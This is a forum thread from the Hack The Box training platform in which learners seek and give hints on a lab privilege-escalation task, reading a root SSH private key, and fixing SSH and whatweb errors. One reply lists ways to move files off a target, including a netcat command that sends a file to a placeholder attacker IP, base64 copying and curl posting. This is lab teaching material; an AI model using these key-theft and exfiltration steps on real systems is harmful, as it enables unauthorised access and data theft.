Module - Getting Started - Privilege Escalation - Second question

Hello all. I have been stuck on the following question in the getting started module for a bit and figured it is time to reach out and see if anyone can shine some light on this for me. Here is the question.

" Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'. "

Anyone that has completed this module - could you post a hint / maybe point to a section inside the module that the answer is in relation to?

Hack The Box

Comments

  • I don't know if you passed this question, but I suggest looking for ssh keys.

  • Type your comment> @elementz1 said:

    I don't know if you passed this question, but I suggest looking for ssh keys.

    any tips for the seconds question? I have cheecked the .ssh folder but I don't have the permission to read the keys

  • I resolved it.. just enumerate the target machine and look at ssh keys

  • Hello everyone. I am still struggling a bit with this. At this point it feels like I am missing something obvious. I am able to grab the .ssh key ( I am just copy and pasting it from the target machine and into a new document on the client machine ). Once I have that I try to SSH into the same target using

    ssh [email protected] -i /path/to/mykey

    but I am unable to get in. It always asks for a password. Ive tried user user1 user2 and root as the username but no luck. Any tips are appreciated.

    Hack The Box

  • @NewHax said:

    Hello everyone. I am still struggling a bit with this. At this point it feels like I am missing something obvious. I am able to grab the .ssh key ( I am just copy and pasting it from the target machine and into a new document on the client machine ). Once I have that I try to SSH into the same target using

    ssh [email protected] -i /path/to/mykey

    but I am unable to get in. It always asks for a password. Ive tried user user1 user2 and root as the username but no luck. Any tips are appreciated.

    Before it asks for a password does it say the permissions are incorrect?

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • edited May 11

    @TazWake

    I do not receive an issue about permissions (I took note of the hint to chmod the id_rsa).

    I do receive an error that says 'invalid format' though.

    I am running the following command

    ssh [email protected]_of_target -p portnumber -i /path/to/my/id_rsa

    Hack The Box

  • @NewHax said:

    @TazWake

    I do not receive an issue about permissions (I took note of the hint to chmod the id_rsa).

    I do receive an error that says 'invalid format' though.

    I am running the following command

    ssh [email protected]_of_target -p portnumber -i /path/to/my/id_rsa

    Ok - so the first things to consider.

    If the remote server is asking for a password, then your key isn't working. If your system is asking for the password, then it is a password protected key.

    So if your key isn't working, you need to check what could be causing that.

    • try file /path/to/your/id_rsa
    • try cat /path/to/your/id_rsa to make sure it is the same file and no extra characters appeared
    • try comparing filesize and word count (wc -l) to make sure the files are identical.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • edited May 11

    @TazWake

    Taz - Thank you so damn much. You not only pointed me in the right direction but gave me insight into how to view the problem to find the right solution. I was finally able to complete this with your help.

    wc -l saved the day.

    The issue I was having was when copy and pasting it was taking 37 lines of text and not the desired 38. I had to manually input a blank line at the end of my key to get this to 38.

    Is there a more proper / accurate way to copy and paste files instead of using ' cat filename ' and just highlighting and copy and pasting from terminal?

    Hack The Box

  • @NewHax said:

    @TazWake

    Taz - Thank you so damn much.

    Always glad to help.

    Is there a more proper / accurate way to copy and paste files instead of using ' cat filename ' and just highlighting and copy and pasting from terminal?

    The short answer is "it depends."

    You can exfiltrate files from Linux systems in a range of ways.

    For example : cat filename | base64 copy the output and on your own machine cat (paste) | base64 -d > filename and you get a good recreation of the file.

    You can also use netcat to sling the file:

    • first check the file md5sum filename
    • listener on your machine nc -nklvp 12345 > filename
    • send the data on the remote machine nc YOURIP 12345 < filename
    • wait a while, kill the listener (not the remote one as that can kill your shell)
    • check the file on your machine md5sum filename - see if it matches, if it does, win.

    If you have SSH access - scp works. You can get more esoteric with curl posting the data or spinning up a temporary webserver on the victim and grabbing it that way.

    Linux gives you a range of options - it often depends on what will work at the time.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • Type your comment> @TazWake said:

    @NewHax said:

    @TazWake

    Taz - Thank you so damn much.

    Always glad to help.

    Is there a more proper / accurate way to copy and paste files instead of using ' cat filename ' and just highlighting and copy and pasting from terminal?

    The short answer is "it depends."

    You can exfiltrate files from Linux systems in a range of ways.

    For example : cat filename | base64 copy the output and on your own machine cat (paste) | base64 -d > filename and you get a good recreation of the file.

    You can also use netcat to sling the file:

    • first check the file md5sum filename
    • listener on your machine nc -nklvp 12345 > filename
    • send the data on the remote machine nc YOURIP 12345 < filename
    • wait a while, kill the listener (not the remote one as that can kill your shell)
    • check the file on your machine md5sum filename - see if it matches, if it does, win.

    If you have SSH access - scp works. You can get more esoteric with curl posting the data or spinning up a temporary webserver on the victim and grabbing it that way.

    Linux gives you a range of options - it often depends on what will work at the time.

    @TazWake You are an impressive writer i always read your comments for more related details once i finish a problem..zzzzzzzzzzzzzz ;-)

  • edited May 24

    When i am trying to go to nibbleblog through whatweb it shows --"ERROR Opening: http://i.p./nibbleblog/ - Net::ReadTimeout " Error and does not load the required Webpage ...can anyone help...

  • edited May 24

    Type your comment> @SPARTANone17 said:

    When i am trying to go to nibbleblog through whatweb it shows --"ERROR Opening: http://i.p./nibbleblog/ - Net::ReadTimeout " Error and does not load the required Webpage ...can anyone help...

    What command did you use? Have you changed the error message to hide the IP, or are you passing http://i.p./nibbleblog/ as the host to whatweb?

  • edited May 26

    Type your comment> @PoirsLJpHY said:

    Type your comment> @SPARTANone17 said:

    When i am trying to go to nibbleblog through whatweb it shows --"ERROR Opening: http://i.p./nibbleblog/ - Net::ReadTimeout " Error and does not load the required Webpage ...can anyone help...

    What command did you use? Have you changed the error message to hide the IP, or are you passing http://i.p./nibbleblog/ as the host to whatweb?

  • Type your comment> @SPARTANone17 said:

    Type your comment> @PoirsLJpHY said:

    Type your comment> @SPARTANone17 said:

    When i am trying to go to nibbleblog through whatweb it shows --"ERROR Opening: http://i.p./nibbleblog/ - Net::ReadTimeout " Error and does not load the required Webpage ...can anyone help...

    What command did you use? Have you changed the error message to hide the IP, or are you passing http://i.p./nibbleblog/ as the host to whatweb?

    You need to provide the real ip or hostname to whatweb, "ip" is just a placeholder. I'm also not sure that you need to provide the http:// prefix or the /nibbleblog/ suffix when using whatweb. So if the IP address of your target was 10.10.10.10, you could use the following command :

    whatweb 10.10.10.10
    

    Here is the help page for whatweb, with a usage example at the bottom : https://tools.kali.org/web-applications/whatweb

    Let me know if you manage to get it working, best of luck!

  • Type your comment> @PoirsLJpHY said:

    Type your comment> @SPARTANone17 said:

    Type your comment> @PoirsLJpHY said:

    Type your comment> @SPARTANone17 said:

    When i am trying to go to nibbleblog through whatweb it shows --"ERROR Opening: http://i.p./nibbleblog/ - Net::ReadTimeout " Error and does not load the required Webpage ...can anyone help...

    What command did you use? Have you changed the error message to hide the IP, or are you passing http://i.p./nibbleblog/ as the host to whatweb?

    You need to provide the real ip or hostname to whatweb, "ip" is just a placeholder. I'm also not sure that you need to provide the http:// prefix or the /nibbleblog/ suffix when using whatweb. So if the IP address of your target was 10.10.10.10, you could use the following command :

    whatweb 10.10.10.10
    

    Here is the help page for whatweb, with a usage example at the bottom : https://tools.kali.org/web-applications/whatweb

    Let me know if you manage to get it working, best of luck!

    No i was using the IP address of the server in place of ip. I was just showing you the syntak earlier. say the ip of server was for example 10.10.10.121 then i used the command whatweb http://10.10.10.121/nibbleblog/
    but that was showing error to me..

  • Type your comment> @SPARTANone17 said:

    Type your comment> @PoirsLJpHY said:

    Type your comment> @SPARTANone17 said:

    Type your comment> @PoirsLJpHY said:

    Type your comment> @SPARTANone17 said:

    When i am trying to go to nibbleblog through whatweb it shows --"ERROR Opening: http://i.p./nibbleblog/ - Net::ReadTimeout " Error and does not load the required Webpage ...can anyone help...

    What command did you use? Have you changed the error message to hide the IP, or are you passing http://i.p./nibbleblog/ as the host to whatweb?

    You need to provide the real ip or hostname to whatweb, "ip" is just a placeholder. I'm also not sure that you need to provide the http:// prefix or the /nibbleblog/ suffix when using whatweb. So if the IP address of your target was 10.10.10.10, you could use the following command :

    whatweb 10.10.10.10
    

    Here is the help page for whatweb, with a usage example at the bottom : https://tools.kali.org/web-applications/whatweb

    Let me know if you manage to get it working, best of luck!

    No i was using the IP address of the server in place of ip. I was just showing you the syntak earlier. say the ip of server was for example 10.10.10.121 then i used the command whatweb http://10.10.10.121/nibbleblog/
    but that was showing error to me..

    Ah, apologies. In that case the command looks correct. Try using whatweb with a site you know to be accessible - e.g. www.google.com. If that works, it is probably worth double checking that the machine you're running the command from is correctly connected to the VPN, and that the target machine is up.

    In this specific case, you already have quite a lot of information on what technologies the target is running - you know, for example, that they are using nibbleblog.

  • @PoirsLJpHY
    I think Sometimes the Kali machiene loses connection in between or something like that because when i try to use the PWN box it works fine i was able to clear task easily Or maybe there would have been an error by my side...

  • @TazWake
    Since user2 had read access over root's .ssh, I copied the id_rsa from there to a folder under user2, changed the permission too, but whenever I try to ssh to the server as root, I'm getting 'Connection timeout' error. Any idea on this?

    [email protected]:~$ ssh -p 31958 [email protected] -i id_rsa
    ssh: connect to host 178.62.61.23 port 31958: Connection timed out

    Here's the error, I tried all the users i.e., user1, user2, root. All giving same errors.

  • Type your comment> @SushWannaHack said:

    @TazWake
    Since user2 had read access over root's .ssh, I copied the id_rsa from there to a folder under user2, changed the permission too, but whenever I try to ssh to the server as root, I'm getting 'Connection timeout' error. Any idea on this?

    [email protected]:~$ ssh -p 31958 [email protected] -i id_rsa
    ssh: connect to host 178.62.61.23 port 31958: Connection timed out

    Here's the error, I tried all the users i.e., user1, user2, root. All giving same errors.

    It implies there isn't a route to 178.62.61.23 - are you sure that is the correct IP address?

    The error implies a networking issue. If you are confident the IP and port are correct, it would be worth troubleshooting with traceroute and maybe even nmap.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • @TazWake , yes both the IP and ports are correct. I even spawned many other IPs and tried to connect to them thinking that there might be issue with this particular IP. But no luck, same issue with all IPs. Is there any other way to gain root access?

  • @SushWannaHack said:

    @TazWake , yes both the IP and ports are correct. I even spawned many other IPs and tried to connect to them thinking that there might be issue with this particular IP. But no luck, same issue with all IPs. Is there any other way to gain root access?

    I don't know - I haven't looked at this module.

    What is the result of traceroute?

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • @TazWake , I finally resolved the issue and got the flag. I wasn't able to escalate user2 to root even after so many attempts (timedout error), so I just copied id_rsa to the pawned machine and used it to ssh to root.

  • @SushWannaHack said:

    @TazWake , I finally resolved the issue and got the flag. I wasn't able to escalate user2 to root even after so many attempts (timedout error), so I just copied id_rsa to the pawned machine and used it to ssh to root.

    Hey, if it works, it works.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

Sign In to comment.